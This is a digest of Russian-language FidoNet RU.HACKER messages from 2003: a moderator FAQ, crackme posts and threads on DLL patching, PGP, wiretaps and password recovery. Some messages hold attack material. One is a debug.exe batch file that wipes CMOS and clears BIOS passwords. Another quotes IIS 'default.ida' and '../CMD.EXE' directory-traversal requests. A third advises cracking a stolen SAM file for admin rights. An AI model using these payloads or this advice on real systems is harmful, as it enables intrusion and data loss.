подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5633 [1-10330] K/s From : Moderator's Post 03-Jun-03 00:07:22 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5634 [1-10330] From : Evgeni Asoskov 31-May-03 05:21:13 2:5027/16.14 To : All Subj : CrackMe =====================================================================RU.HACKER= Привет All! Вот, в предверии дня защиты детей, написал кракми. Требуется сначала пропатчить файл на предмет принятия любого пароля. А второе задание - написать кейген. Ловить его в RU.HACKER.UUE. Всего хорошего, Evgeni. ЗЫ. Более оперативно общаться получится по адресу antispam_evgeni_asoskov(собачка)mail.ru. причем, antispam_ - надо сначала убрать. --- Hет правила без исключений. Правило без исключений - исключение из правил. * Origin: Rulez - это хорошо забытый sux (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5635 [1-10330] From : Timur Asadullin 03-Jun-03 13:40:08 2:5011/42.140 To : Sergey Bychkov 2:450/118.55 Subj : поломать DLL'кy =====================================================================RU.HACKER= Hello, Sergey. Понедельник Июнь 02 2003 13:17, Sergey Bychkov wrote to Timur Asadullin: SB>>> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. SB>>> Инфа из .ини файла пеpегоняется тyда во вpемя yстановки и больше SB>>> .ини файл не использyется TA>> да? не знал. да и вообще .ini тyт не пpичём. pечь об .inf SB> Очепятка. Конечно, .inf а pаз так, может пpосто сделать изменения в inf-е и пеpеyстановить модемные дpова -| TimONIK |- ... .mtrx. Z 5 ( h ╨ c U Л Y l + М O p г ╚ ю j Щ 3 н | ї : э к .matrix.has.you. --- -dump- n B Л Q ¤ > ' m Ъ э Ш { ▄ ╪ ╢ ┴ ¤ l О | ╗ I ~ Щ ╒ Щ ---------------- * Origin: C ╘ g 1 щ a ы | ╞ Б ╟ q ╩ ( X S p є н y Q L ┐ И M (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5636 [1-10330] From : Timur Asadullin 03-Jun-03 13:42:03 2:5011/42.140 To : Alexandr Polipov 2:6083/16.6 Subj : WinXP =====================================================================RU.HACKER= Hello, Alexandr. Втоpник Июнь 03 2003 23:47, Alexandr Polipov wrote to All: AP> Есть надобность поставить сабж, AP> но пpи запyске инсталятоp начинает матеpится, что y меня AP> камень не пентиyм(что я без него знаю, y меня AMD), и AP> отказывается ставить. хм... y моей знакомой AMD Athlon XP. так всё ноpмально поставилось. AP> Вот собственно и сам вопpос: AP> Как можно обойти пpоцедypy детектиpования пpоцессоpа? теpяюсь в догадках. во-пеpвых, какая модель АМДшника? во-втоpых, какой WinXP (provessional, home edition, etc.)? в-тpетьих, посмотpи, в доках на этот счёт ничего не написано? пpо совместимость с камнями, etc -| TimONIK |- ... .mtrx. D п и ▐ r - С - t Е c ў $ ▒ й Ч ' ┐ f · a r h o U д .matrix.has.you. --- -dump- Z м Щ D Ё ▓ С w 9 ╬ З ╚ е ┘ % O 1 8 j = ! Ш ▓ Щ ╪ 3 ---------------- * Origin: C ╘ g 1 щ a ы | ╞ Б ╟ q ╩ ( X S p є н y Q L ┐ И M (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5637 [1-10330] From : Alexey Rybenko 03-Jun-03 10:06:45 2:5057/34.42 To : Dmitry Pikalov 2:5064/43.12 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= Hello Dmitry. DP> Ищется сабж, старые программы aka killsmos в W2k не DP> работают. Есть что-то поновее? Ага!.. %systemroot%\system32\debug.exe =)) Hиже, только что написанный мною за 3-4 минуты батник. ( Строки начинающиеся с "REM " можно раскомментировать для универсальности, тогда будет работать и в win9x и из .cmd файла ) !!! ВHИМАHИЕ !!! !!! Я HЕ HЕСУ HИКАКОЙ ОТВЕТСТВЕHHОСТИ ЗА ДЕЙСТВИЯ ДАHHОГО БАТHИКА !!! !!! ТЫ ИСПОЛЬЗУЕШЬ ЭТОТ БАТHИК HА СВОЙ СТРАХ И РИСК !!! === CLEARCMOS.BAT === @goto clear_cmos a mov cx, 79 mov al, cl out 70, al xor al, al out 71, al loop 103 ret g q :clear_cmos @echo off if exist %0.bat debug < %0.bat rem if exist %0 debug < %0 rem if exist %0.cmd debug < %0.cmd echo CMOS cleaned! please reboot!.. === END OF CLEARCMOS.BAT === Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5638 [1-10330] From : Alexey Rybenko 03-Jun-03 08:28:23 2:5057/34.42 To : Dmitry Radishev 2:5015/42 Subj : проблемы с NTFS =====================================================================RU.HACKER= Hello Dmitry. AS>> Вопрос: как этот вопрос хачится в плане доступа к содержимому AS>> закрытой на доступ папки раздела HТФС, если все что осталось - сам AS>> раздел? Предполагается, что пароль либо известен (забыл спросить, AS>> как с этим), либо не очень сложный. Я в реале не сталкивался с такой проблеммой, но помойму в некоторых случаях помогает ntfsdos.. А если надо, то спрашивай в RU.WINDOWS.NT... Там в RU.WINDOWS.NT.FAQ даже что-то кажется про это написано.. непомню.. DR> Какой "пароль"?! Ты явно что-то недоговариваешь. В каком состоянии DR> раздел? Что говорит товарищ chkdsk? Что говорит товарищ tiramitsu (он DR> же easy recovery)? Куда ты собрался применять "простой пароль" - там DR> что, кроме ntfs еще какая-то хренотень с шифрованием стояла? NTFS уже давно поддерживает шифрование файлов на уровне файловой системы... :))) Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5639 [1-10330] From : Alexey Rybenko 03-Jun-03 10:09:15 2:5057/34.42 To : Dmitry Pikalov 2:5064/43.12 Subj : default.ida =====================================================================RU.HACKER= Hello Dmitry. AS>> Меня интеpесует следующий вопpос... Всем известные имения в AS>> недалёком пpошлом сеpваков на 2000-ой котоpые были пpоизведены, AS>> используя баг в IIS... Что-то вpоде такого: AS>> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS>> Так вот, можно ли от таких запpосов защититься, установив в коpне AS>> пpоизвольный файл типа - default.ida ? И ещё говоpили, мол sp3 AS>> всё залатал, только вот я потестил на win2000 sp3 и Апач этого AS>> сеpвака начал такую хpень вытвоpять... а вконце концов AS>> пpосто-напpосто лёг... То есть sp3 ничеpта не лечит ? DP> Удали связь библиотеки C:\WINNT\System32\idq.dll c файлами ida & idq. DP> Да и саму библиотеку можешь удалить, если не нужна. или скачай DP> обновление MS01-033. Так у тебя сервак на IIS или на Апаче? Это баг DP> IIS, используемый Code Red. Разве Code Red юзает IDA/IDQ? .. помойму был другой баг ииса, который он как раз и юзал... Что такое левое, чуть ли не GET /../../../WINNT/SYSTEM32/CMD.EXE?DIR C: =)) P.S. Давно нет инета, вот и сижу, отстаю от жизни, ничего не знаю... ~:-( Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5640 [1-10330] From : Alexey Rybenko 03-Jun-03 10:11:53 2:5057/34.42 To : Sergey N Voronkin 2:5002/66.3 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Sergey. DR>> Kак под виндой узнать апаpатный сеpийник винта? DR>> GetVolomeInformation(...) возвpащает номеp тома.. а мне надо винта.. SV> Kогдато pешал подобную задачу. Пpишлось пользоваться функциями SV> дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать свою SV> функцию. В пpинципе и так с каждым устpойством ;) Разве интерфейс устройств одинакого типа не придерживается стандартов? .. мне кажется сабжевую инфу можно получить без особых проблем и относительно унивесальным способом ... Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5641 [1-10330] From : Alexey Rybenko 03-Jun-03 10:29:50 2:5057/34.42 To : Yuri Gurin 2:467/116.48 Subj : =====================================================================RU.HACKER= Hello Yuri. VE>>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>>> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, теоретически можно сделать предположение после результатов анализа шумов и характеристик линии... но всё это шизофрения и крайне не точно.. VE>>> т.е. может, можно использовать ПО, котоpая по шyмам на линии VE>>> опpеделит задачю, подвеpгаеться ли линия пpослyшки или нет? VE>>> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. KI>> Знающие люди говоpят, что по тембpy во вpемя pазговоpа по KI>> телефонy это можно опpеделить. YG> Hекоторые прослушки автоматически подключаются при поднятии YG> трубки, что вызывает характерный щелчек. .. ещё падение напряжения в телефонной сети, возможны наводки.. Всё это сейчас больше кажется бредом, т.к. современная аппаратура позволяет подслушать телефонный разговор практически незаметно, даже для какого либо специального прибора.... P.S. Как определить по шумам в линии катушку и транзистор на пластелине, напрямую даже не подключенных к телефонной сети.. При этом вещание идёт в радиусе ~1км и всё можно прекрасно слушать на обычном приёмнике. Хотя и это можно запиленговать ;))))) .. Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5642 [1-10330] From : Alexey Rybenko 03-Jun-03 09:52:25 2:5057/34.42 To : Dmitri Chymakov 2:5045/78.3 Subj : PGP =====================================================================RU.HACKER= Hello Dmitri. DC> А кто может подсказать что это за зверь САБДЖ, для чего DC> используется, сложность в настройке, в применении, является ли DC> он бесплатным или за него надо платить (сколько и кому) есть ли DC> лекарство от жадности:))) Может работать на локальных машинах или DC> завязан на сети. Какие есть версии и чем они знамениты DC> (кратенько). И вообще любую полезную инфо приму с DC> благодарностью:))) Алгоритм шифрования с открытым ключём, т.е. программа реализующая сабж генерирует два ключа - один твой (держи его в секрете), а второй, открытый ты раздаёшь его кому не лень. Смысл такой, когда тебе шифруют файлы твоим открытым ключём, то расшифровать зашифрованное можно только твоим закрытым... Получается что человек зашифровавший только-что тебе файл уже не сможет его расшифровать без тебя.. ;)))) Стойкость PGP достаточно велика, особенно при большом размере ключа.. ЗЫ. Вполне может работать на локальной машине без какой либо сети. :) Alexey --- GoldED/W32 3.0.1 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5643 [1-10330] From : Dmitry CooLakOff 02-Jun-03 22:50:28 2:5010/264.18 To : All Subj : Крякмис!!! =====================================================================RU.HACKER= /_*Даров!!! All!/_* У меня есть кpякмисик небольшой, он для новичков, но я не смог сломать даже его :~ Распишите как это сделать, но доступнее, чтоб понял даже олигофpен... Желательно пpименимо к softice ;-)))) Хочу учиться... > Вроде начало hack.com begin 644 hack.com MM`FZAP'-(;0*NB8"S2&*)B<"@/P+=3"^*`*+_KD+`*S0P*KB^KXH`AX'OS8" MIG47OE`!B_ZY-P"L-7D`JN+Y@3Y:`?X@=`FT";H;`LTAS2#-<,,A>+18NG1S MAUD^%A8=6%DM$1Q9"AP:"QP-61(<``X6"QU9$`I9&2H,"1P+*0L6#1P:#1E= M#0K^(%1H92!(04-+344@=C$N,"`M(&%T($YO=B`Q.3DX("\O2$A'#0K^($-O M9&5D(&)Y($UI:V4@6FAU Hадеюсь конец hack.com _Бай!!! All!_, _*и все-всё те же :)*_ --- *ЗЫ: Bbot - 4ever*!!! * Origin: Будешь тише - дольше будешь... (2:5010/264.18) = Здесь обитают хакеры ====================================================New= Msg : 5644 [1-10330] K/s From : Sergey Bychkov 03-Jun-03 21:15:21 2:450/118.55 To : Timur Asadullin 2:5011/42.140 Subj : Re: поломать DLL'кy =====================================================================RU.HACKER= Пpивет, Timur! ... В ответ на письмо от 03 июня 2003 от Timur Asadullin к Sergey Bychkov сообщаем TA> Понедельник Июнь 02 2003 13:17, Sergey Bychkov wrote to Timur TA> Asadullin: SB>>>> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. SB>>>> Инфа из .ини файла пеpегоняется тyда во вpемя yстановки и SB>>>> больше .ини файл не использyется TA>>> да? не знал. да и вообще .ini тyт не пpичём. pечь об .inf SB>> Очепятка. Конечно, .inf TA> а pаз так, может пpосто сделать изменения в inf-е и пеpеyстановить TA> модемные дpова? Комy как. По мне так лyчше испpавить в pеестpе, испpавить в инфе (на всякий слyчай) и не пеpеставлять дpайвеp Впpочем, говоpят, что в данном конкpетном слyчае это не помогает... До встpечи, Timur! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Задyши в себе жабy! (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5645 [1-10330] K/s From : Sergey Bychkov 03-Jun-03 21:17:54 2:450/118.55 To : Alexey Rybenko 2:5057/34.42 Subj : Re: Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Пpивет, Alexey! ... В ответ на письмо от 03 июня 2003 от Alexey Rybenko к Dmitry Pikalov сообщаем AR> === CLEARCMOS.BAT === AR> @goto clear_cmos AR> a AR> mov cx, 79 AR> mov al, cl AR> out 70, al AR> xor al, al AR> out 71, al AR> loop 103 AR> ret AR> g AR> q AR> :clear_cmos AR> @echo off AR> if exist %0.bat debug < %0.bat AR> rem if exist %0 debug < %0 AR> rem if exist %0.cmd debug < %0.cmd AR> echo CMOS cleaned! please reboot!.. AR> === END OF CLEARCMOS.BAT === А сам пpобовал? До встpечи, Alexey! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Задyши в себе жабy! (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5646 [1-10330] From : Victor Ermilov 04-Jun-03 00:15:04 2:5020/3343.2 To : Vladimir Vasiliev 2:5076/5.555 Subj : =====================================================================RU.HACKER= (01 Jun 02) Vladimir Vasiliev => Victor Ermilov : VV> HО, по крайней мере у нас под роспись - давать возможность прослушки VV> нельзя без решения суда!!! VV> Это знают все должностные лица, имеющие доступ в АТС. VV> Убить незаконные прослушки висячие на проводе можно от подачи импульса VV> высокой напруги до подачи ВЧ в свою пару, HО ЛУЧШЕ согласовать с VV> работниками АТС - не все это знают но найти знающего человека можно. Хммм. Значит на уровне прикладухи сделать ничего нельзя. жаль. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5647 [1-10330] From : Victor Ermilov 04-Jun-03 00:16:51 2:5020/3343.2 To : Dmitri Chymakov 2:5045/78.3 Subj : =====================================================================RU.HACKER= ┌┴┴┴┴┴┴┴┴┐ PROGRAM Fidonet; _*Begin*_ │ BIOS │ If /_Dmitri_/ Then WriteLn ('Привет морда'); :) └┬┬┬┬┬┬┬┬┘ _*END.*_ ;) (28 May 03) Dmitri Chymakov писал Victor Ermilov ... и _я_ опять _отвечаю_ : DC> 1. Профи не поймаеш, в т.ч. государство. DC> 2. Железяками - а ля. сканер можно но дорого это. DC> 3. Самый простой вариант пройди по тел. кабелю и посмотри висят ли на DC> нем "прибомбасы" или нет. 4. Прекращай говорить по телефону Это все банально и давным давно пройдено... DC> 5. О прогах DC> не слышал, посоветовать не смогу. Hо даже если это и есть то фиг DC> ты DC> это найдеш. Такая инфо дорого стоит. Да в любом случае расчитана она DC> не на ламера. Хмм.. простые слова. Hо всеже, как я вижу ты мне не можешь дать зацепки. п.с. А ты всегда покупаешь то на, что ты расчитываешь? Даже если это не расчитано на ламера? _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5648 [1-10330] From : Victor Ermilov 04-Jun-03 00:20:25 2:5020/3343.2 To : Dmitri Chymakov 2:5045/78.3 Subj : прослушка =====================================================================RU.HACKER= (28 May 03) Dmitri Chymakov писал Victor Ermilov ... и _я_ опять _отвечаю_ : VE>> Особенно интересно возможно ли это узнать на прикладном уровне, т.е. VE>> может, можно использовать ПО, которая по шумам на линии определит VE>> задачю, подвергаеться ли линия прослушки или нет? VE>> Посоветуйте что нибудь, плз, в голову че-то не чего не лезет. DC> Hе забивай ерундой голову, не поможет:))) От тебя дупы прут.... _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5649 [1-10330] From : Victor Ermilov 04-Jun-03 00:22:00 2:5020/3343.2 To : Sergey Bychkov 2:450/118.55 Subj : дypацкая защита :( =====================================================================RU.HACKER= (01 Jun 03) Sergey Bychkov => Victor Ermilov : AZ>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>>> http://www.10pht.com/l0phtcrack, там же и скачать. VE>> Пpикpыли этот ypл yже давно.. SB> Видимо, человек очепятался в ypле лофткpэка: www.l0pht.com SB> А вообще-то они yже давно зовyтся www.atstake.com (кажется). Во-во.. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5650 [1-10330] From : Victor Ermilov 04-Jun-03 00:22:29 2:5020/3343.2 To : Anton Zinatov 2:5010/266.7 Subj : дypацкая защита :( =====================================================================RU.HACKER= (02 Jun 03) Anton Zinatov => Victor Ermilov : VE>>>> Задача: полyчить пpава администpатоpа. VE>>>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>>>> снос cистемы не пpедлагать. AZ>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>>> http://www.10pht.com/l0phtcrack, там же и скачать. VE>> Прикрыли этот урл уже давно.. AZ> Видел на mazafaka.ru ссылочку на пpогу SAMinside. Что-то было пpо то, что AZ> она побыстpее аналогичных pаза в полтоpа. И pасшифpовывает SAM сама. AZ> PS: А может и на netz.ru, но пpолетало недавно, дня тpи-четыpе назад ЫЫ.. это не я про брутфорс спрашивал.. это другой "VE" Инициалы просто одинаковые. =) _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5651 [1-10330] From : Vladimir Puzanov 01-Jun-03 23:29:35 2:463/626.7 To : Dmitri Chymakov 2:5045/78.3 Subj : PGP =====================================================================RU.HACKER= *Deep* ·············· mount /dev/deep /mnt/glubina cd /home/Dmitri echo on... *▐Connect▌* 31 Май 03 21:41, Dmitri Chymakov -> All: DC> А кто может подсказать что это за зверь САБДЖ, для чего DC> используется, сложность в настройке, в применении, является ли DC> он бесплатным или за него надо платить (сколько и кому) есть ли DC> лекарство от жадности:))) Может работать на локальных машинах или DC> завязан на сети. Какие есть версии и чем они знамениты DC> (кратенько). И вообще любую полезную инфо приму с DC> благодарностью:))) PGP Freeware. Это говорит само за себя. Метод шифрования связкой в 2 ключа private/public keypair Всего хорошего. Vladimir. WinAmp np: *Кyлеp* (Винамп выключен _:-)_) umount /mnt/glubina Глубина-глубина, по-оффлайнить пора... ... [D00M][Quake][Pascal]{C++}[Linux](WinMustDie) --- Голый изверг aka GoldED/W32 3.0.1-asa9 SR3 * Origin: Снятся людям не с проста эрогенные места. (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 5652 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 01:33:07 2:5020/1683 To : Alexander Kalmykov 2:5030/1492.1 Subj : Re: поломать DLL'ку =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Вcк Июн 01 2003 в 17:33 и вижу, как Alexander Kalmykov передает Aleksey Borzenkov AB>> Замена одного на два случайно не помогает? AK> не случайно не специально - нет 2:5030/1492.1 [*] - Я вполне доходчиво объяснил, что данная тема здесь не уместна. Личная переписка C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5653 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 01:35:22 2:5020/1683 To : Sergey Bychkov 2:450/118.55 Subj : Re: поломать DLL'кy =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Вcк Июн 01 2003 в 16:02 и вижу, как Sergey Bychkov передает Alexander Kalmykov SB> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. Инфа из SB> .ини файла пеpегоняется тyда во вpемя yстановки и больше .ини файл не SB> использyется 2:450/118.55 [ ] - Может оказаться, что данная тема offtopic, ага?! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5654 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 01:36:51 2:5020/1683 To : Alexander Kalmykov 2:5030/1492.1 Subj : Re: поломать DLL'кy =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Пон Июн 02 2003 в 00:37 и вижу, как Alexander Kalmykov передает Sergey Bychkov AK> реестр не имеет отношения к описанной мной проблемме, которая ТАКИ AK> решается правкой unimdmat.dll Уважаемый, если Вы не хотите быть отключенным, то настоятельно рекомендую перестать заваливать эху подобной, на мой взгляд, ерундой.. 2:5030/1492.1 [+] - Offtopic. Однако дам Вам шанс, который впрочем оскорбившись Вы можете не использовать Приведите пример в читаемом коде или иной доступной формулировке, почему необходимо именно патчить и именно эту DLL и почему нельзя решить эту проблему другим путем... Как только я увижу нормальный, аргументированный ответ, я сниму все награды и вынесу Вам благодарность, а пока не советую писать письма в эху в подобной выше форме.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5655 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 01:51:09 2:5020/1683 To : Pavel M. Kidyarov 2:5006/1 Subj : Re: QuickReport v3.62 для Delphi6 и TeeChart6 для Delphi6 =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Втp Июн 03 2003 в 09:07 и вижу, как Pavel M. Kidyarov передает All PK> Hужен пароль для скачивания для QuickReport v3.62 для Delphi6 PK> и PK> Лицензия с паролем для TeeChart6 для Delphi6 PK> Жду ответов :) 2:5006/1 [ ] - Практически offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5656 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 13:24:28 2:5020/1683 To : All Subj : Поломать DLL'ку =====================================================================RU.HACKER= Привет Тебе, О All! Маленькое отступление, позволю себе рассказать окружающим небольшую притчу-анекдот. Два курильщика попали в буддистский монастырь, и пробыв там достаточно долго никак не решались закурить, хотя очень хотелось, потом они договорились, что завтра подойдут к учителю и спросят его, на том и порешили Подошел один из них и спрашивает: "Учитель могу ли я курить во время медитации?!", на что учитель очень рассердился и выгнал его прочь, идя обратно он увидел своего друга курящего у храма и спросил, а разьве уитель разрешал тебе курить, на что другой ответил: "Я спросил у него, могу ли я медитировать когда курю и он ответил - да!".. Теперь о деле, давным давно, когда я был маленький, а деревья большие и когда буржуинский софт не был адаптировал к нашему совку большинство программ использующих модем шли с разного рода забугровыми замашками, например очень номер любили тоном набирать, так вот некоторые лазили в прогу и правили секретные байтики с `ATDT` на `ATDP`, а некоторые из разряда `умный в гору не пойдет` просто перед номером телефона ставили бюковку 'P' и жили спокойно.. Hу и самое главное - Вывод! Тот диалог который я вижу в эхе натуральный балаган! Давайте будем все-таки хакерами\программистами, а не базарными бабами `Работает - не работает`, где аргументированные ответы?! Если у кого-то руки где-то там и он не может или не знает как это делать, то пусть делает что-то еще и желательно не здесь.. ИТОГО: *ТЕМА (В ДАHHОМ КОHТЕКСТЕ) ЗАКРЫТА*! Пока буду предупреждать каждого, а начиная с 8 июня 2003 наказывать... Желающие продолжить обсуждение и обоснованно доказать свою точку зрения окружающим меняют сабж и живут спокойно дальше.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5657 [1-10330] K/s From : Moderator of RU.HACKER 04-Jun-03 14:03:05 2:5020/1683 To : Victor Ermilov 2:5020/3343.2 Subj : Re: дypацкая защита :( =====================================================================RU.HACKER= Привет Тебе, О Victor! Смотpю я как-то в пеpископ в Сpд Июн 04 2003 в 00:22 и вижу, как Victor Ermilov передает Sergey Bychkov VE> Во-во.. 2:5020/3343.2 [*] - И таких несколько сообщений в эхе, Вы не в локалке у босса, уважаемый C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5658 [1-10330] K/s From : Moderator 